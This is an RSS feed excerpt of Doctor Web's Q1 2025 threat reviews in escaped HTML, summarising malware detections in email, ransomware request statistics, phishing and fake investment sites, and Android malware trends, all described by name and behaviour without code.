    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name of an Electron framework host process modified by threat actors. It mimics a Steam application component (Steam Client WebHelper) and loads a JavaScript backdoor.&lt;/dd&gt;
  &lt;/dl&gt;
  &lt;h3 class="alignCenter"&gt;Statistics for malware discovered in email traffic&lt;/h3&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/02_mail_traffic_q1_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/02_mail_traffic_q1_2025_en.png" alt="mail_traffic_2025_Q1"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A family of malicious JavaScripts that inject a malicious script into the HTML code of webpages.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AVKill.63950&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;This is a dropper that installs the &lt;b&gt;JS.BackDoor.42&lt;/b&gt; backdoor on computers running the Windows operating system.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Inject5.13806&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious program for Windows-based computers that was created using the AutoIt scripting language. It launches several system processes and injects the &lt;b&gt;Trojan.Fbng&lt;/b&gt; spyware trojan into them. The attackers can use the latter as banking malware and for other purposes.&lt;/dd&gt;
  &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="encruptor"&gt;
  &lt;h2 class="alignCenter"&gt;Encryption ransomware&lt;/h2&gt;
  &lt;p&gt;
    In Q1 2025, the number of requests made to decrypt files affected by encoder trojans decreased by 9.34%, compared to Q4 2024.
  &lt;/p&gt;
  &lt;p&gt;
    The dynamics of the decryption requests received by Doctor Web’s technical support service:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/03_encoder_requests_q1_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/03_encoder_requests_q1_2025_en.png" alt="encoder_stat_2025_Q1"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;The most common encoders of Q1 2025:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 11.89% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 5.95% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder. 35067&lt;/b&gt; — 3.57% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.38200&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.38200&lt;/b&gt;&lt;/a&gt; — 2.38% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.37369&lt;/b&gt; — 1.98% of user requests&lt;/li&gt;
  &lt;/ul&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="netfraud"&gt;
  &lt;h2 class="alignCenter"&gt;Network fraud&lt;/h2&gt;
  &lt;p&gt;
    In Q1 2025, Doctor Web’s Internet analysts observed the emergence of many new phishing websites designed 
    to steal Telegram messenger user accounts. Among the most common variants were fake login pages and support 
    pages that informed users about alleged problems due to some violation of the terms of service. 
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/04_scam_telegram_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/04_scam_telegram_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/05_scam_telegram_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/05_scam_telegram_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Fake sites of online stores were widespread once again. On these, cybercriminals asked potential victims to log in to their accounts.
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/06_scam_onlinestore_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/06_scam_onlinestore_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    A phishing authorization form on a fake website of one Russian online store
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;
    Our specialists continued detecting fraudulent sites with all sorts of “great offers”, such as quick or easy ways to make money; 
    others were about receiving certain gifts, participating in promotions, etc. One of the schemes, for instance, targeted residents 
    of Great Britain, offering them the chance to obtain “limited edition” transportation cards, which were supposedly dedicated to the 
    anniversaries of various carriers and would allow them to use public transport services free of charge for a long period of time.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/07_scam_transportcard_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/07_scam_transportcard_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/08_scam_transportcard_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/08_scam_transportcard_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    Fraudulent sites offering the chance to obtain “special” First Essex and Oyster transportation cards that allow public transport services to be used for free
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;
    Users had to answer several questions and then play a game by opening virtual gift boxes (the “winning” box in such scenarios is hardcoded). 
    After “winning”, users had to provide personal information and pay £2 to “receive” the promised card. As a result, the victims’ personal 
    information and money ended up in the hands of threat actors.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/09_transport_gift_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/09_transport_gift_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/10_transport_gift_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/10_transport_gift_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    A potential victim has allegedly obtained a card successfully from one of the game boxes, and in order to receive it, they must provide personal data and also pay £2
  &lt;/em&gt;&lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/11_transportcard_pay_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/11_transportcard_pay_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    A form for entering bank card details to pay for a non-existent promotional transportation card
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;
    Fraudsters continue luring potential victims with all sorts of trading platforms that have “unique” algorithms, including 
    ones that are supposedly based on artificial intelligence (AI) technologies. At the same time, cybercriminals exploit the 
    names of famous people and hide behind real companies and services, attributing to themselves a connection with them. One 
    popular scenario is based on claims that users can make money with the help of certain specialized services from Telegram, 
    WhatsApp, and other companies.
  &lt;/p&gt;
  &lt;p&gt;
    Some of these fraudulent sites were advertising various AI platforms, such as Telegram AI and WHATSAPP AI, which allegedly 
    could help users make at least €14,000 per month, thanks to an “automated trading system”:
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/12_scam_telegramai_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/12_scam_telegramai_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/13_scam_whatsappai_q1_2025.PNG" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/13_scam_whatsappai_q1_2025.PNG" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Other variants exploited the theme of trading bots, which are commonly passed off as instruments created by the messengers’ owners themselves. 
    One website, for instance, promised that “Pavel Durov’s bot” Telegram.AI would allow users to earn €2,500+ monthly; and another one offered the 
    option to use the WhatsApp Bot, supposedly created by Mark Zuckerberg, to make up to €500 per day.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/14_scam_telegrambot_q1_2025.PNG" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/14_scam_telegrambot_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/15_scam_whatsapbot_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/15_scam_whatsapbot_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another scam website offered users the option to register on a “Telegram platform” that allegedly runs directly from a smartphone browser, 
    automatically trades shares of global companies, and earns €10,000 per month:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/16_scam_telegram_platform_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/16_scam_telegram_platform_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    One website promised “every Europe resident” an income starting at €5,000 per month with the help of certain AI-based algorithms from the WhatsApp Company:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/17_scam_whatsapp_platform_q1_2025__new.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/17_scam_whatsapp_platform_q1_2025__new.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Scam platform “The wealth formula” (“Formule Bohatstvi” in Czech), with its fake AI-based trading system, is a popular variation of this fraudulent scheme. 
    It supposedly makes trades in a split second by analyzing huge amounts of data. Different sites of this non-existent system invite visitors to watch an 
    informational video and register an account for consultations in the “anti-crisis solutions office”. The fraudsters are mainly targeting Europeans—Czech 
    users in particular— who are promised an income of €1,000 per day “for life”. To access the system, potential victims are required to make a minimum deposit of €250.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/18_scam_formule_bohatstvi_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/18_scam_formule_bohatstvi_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/19_scam_formule_bohatstvi_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/19_scam_formule_bohatstvi_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Other similar scenarios, such as generating income using various specialized software, also remain popular. 
    One such website invited Czech users to make thousands of crowns per day with “the world’s most intelligent cryptographic software”:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/20_scam_cz_money_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/20_scam_cz_money_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another scam Internet portal promised earnings of over 4.7 million crowns monthly using certain trading software known as «10K EVERY DAY APP»:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/21_scam_10kapp_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/21_scam_10kapp_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    At the same time, users continued encountering fake investment-themed websites targeting residents of different countries. 
    For example, for an audience from Kazakhstan, fraudsters prepared yet another platform for earning passive income through oil and gas trading:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/22_scam_kaz_passive_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/22_scam_kaz_passive_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Many other sites offered the opportunity to “earn as much as possible” by trading shares of companies in Kazakhstan, Russia, China, and other countries:
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/23_scam_kaz_more_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/23_scam_kaz_more_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/24_scam_kaz_more_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/24_scam_kaz_more_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Russian and Kyrgyz residents also encountered similar websites; on these, users allegedly could make money by trading oil and gas:
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/25_scam_kyrgyzgaz_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/25_scam_kyrgyzgaz_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/26_scam_russiagaz_q1_2025.PNG" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/26_scam_russiagaz_q1_2025.PNG" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    And one scam Internet resource offered Romanian users the chance to join the BRUA pipeline project, promising 3,000 lei per week as passive income:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/27_scam_romania_brua_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/27_scam_romania_brua_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Sites that promise government support to the population in the form of benefits, social payments, etc., remain a lure for potential victims. 
    Threat actors, for instance, tried to bait Russian users with more fake &lt;em&gt;Gosuslugi&lt;/em&gt; web portals. One asked them to provide personal 
    data—supposedly to participate in an oil and gas company payment program and also to receive bonuses from the government:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/28_scam_fakegosuslugi_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/28_scam_fakegosuslugi_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another scam site promised every Kazakhstan resident assistance in the form of money payments. It was allegedly organized on behalf of a large bank to “avoid problems and disasters”:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/29_scam_kaz_fakepayments_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/29_scam_kaz_fakepayments_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Fake investing service websites, including those supposedly belonging to Russian credit organizations, are still a problem. 
    Many of them mimic real bank websites in order to confuse potential victims as much as possible.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/30_scam_fakebank_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/30_scam_fakebank_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/31_scam_fakebank_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/31_scam_fakebank_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    Examples of fake Russian bank websites offering access to “investing services”
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href="http://antifraud.drweb.com/dangerous_urls/" target="_blank"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
    &lt;h2 class="alignCenter"&gt;Malicious and unwanted programs for mobile devices&lt;/h2&gt;
    &lt;p&gt;
      According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q1 2025, 
      &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 
      ad-displaying trojans, along with &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious fake programs, were the Android 
      threats most commonly encountered; their activity increased, compared to the last quarter of 2024. In addition, users progressively encountered 
      &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans. In contrast, &lt;b&gt;Android.SpyMax&lt;/b&gt; 
      spyware trojans, whose attacks increased in number almost every month in 2024, were detected less frequently.
    &lt;/p&gt;
    &lt;p&gt;
      Our specialists once again discovered many threats on Google Play. Among them were trojans used in various fraudulent schemes, 
      cryptocurrency-stealing malware, and adware trojans.
    &lt;/p&gt;
    &lt;p&gt;The following Q1 2025 events involving mobile malware are the most noteworthy:&lt;/p&gt;
    &lt;ul&gt;
      &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; adware trojan activity increased.&lt;/li&gt;
      &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans were more active.&lt;/li&gt;
      &lt;li&gt;The number of &lt;b&gt;Android.SpyMax&lt;/b&gt; spyware trojans attacks declined.&lt;/li&gt;
      &lt;li&gt;New threats were discovered on Google Play.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;p&gt;
      To find out more about the security-threat landscape for mobile devices in Q1 2025, read our &lt;a href="https://news.drweb.com/show/review/?i=14991&amp;lng=en" target="_blank"&gt;special overview&lt;/a&gt;.
    &lt;/p&gt;
&lt;/section&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14991&amp;lng=en</guid><title>Doctor Web’s Q1 2025 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=14991&amp;lng=en&amp;c=9</link><pubDate>Thu, 27 Mar 2025 00:00:00 GMT</pubDate><description>



&lt;p&gt;&lt;b&gt;March 27, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, ad-displaying &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; trojans remained the most common Android malware. Moreover, they were detected on protected devices more than twice as often as in the fourth quarter of last year. Second place once again went to &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malware, which cybercriminals use in various fraudulent schemes—their activity increased by almost 8%. Adware trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; family ranked third; the number of their detections almost quintupled.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        Similar dynamics were observed among many banking trojans. For instance, an increase was recorded in the number of attacks involving 
        &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; trojan family members—by 20.68% and 151.71%, respectively. At the same time, &lt;b&gt;Android.SpyMax&lt;/b&gt; 
        trojans, whose activity grew throughout almost all of 2024, were detected 41.94% less frequently than in the previous quarter.
    &lt;/p&gt;
    &lt;p&gt;
        Over the past 3 months, Doctor Web’s specialists discovered dozens of new threats on Google Play. Our virus laboratory’s findings in 
        this catalog included cryptocurrency-stealing malware and other trojans that display intrusive ads, along with the traditionally large 
        number of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans.
    &lt;/p&gt;
    &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
        &lt;h4 class="white alignCenter"&gt;PRINCIPAL TRENDS OF Q1 2025&lt;/h4&gt;
        &lt;ul&gt;
            &lt;li&gt;Increased activity on the part of adware trojans&lt;/li&gt;
            &lt;li&gt;Increased numbers of &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banker malware attacks &lt;/li&gt;
            &lt;li&gt;Decreased activity on the part of &lt;b&gt;Android.SpyMax&lt;/b&gt; spyware trojans&lt;/li&gt;
            &lt;li&gt;The emergence of many new threats on Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h2 class="alignCenter"&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h2&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/01_malware_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/01_malware_q1_2025_en.png" alt="Malware_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Trojan apps designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that loads a website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/02_unwanted_q1_2025_en.png" class="preview"&gt;
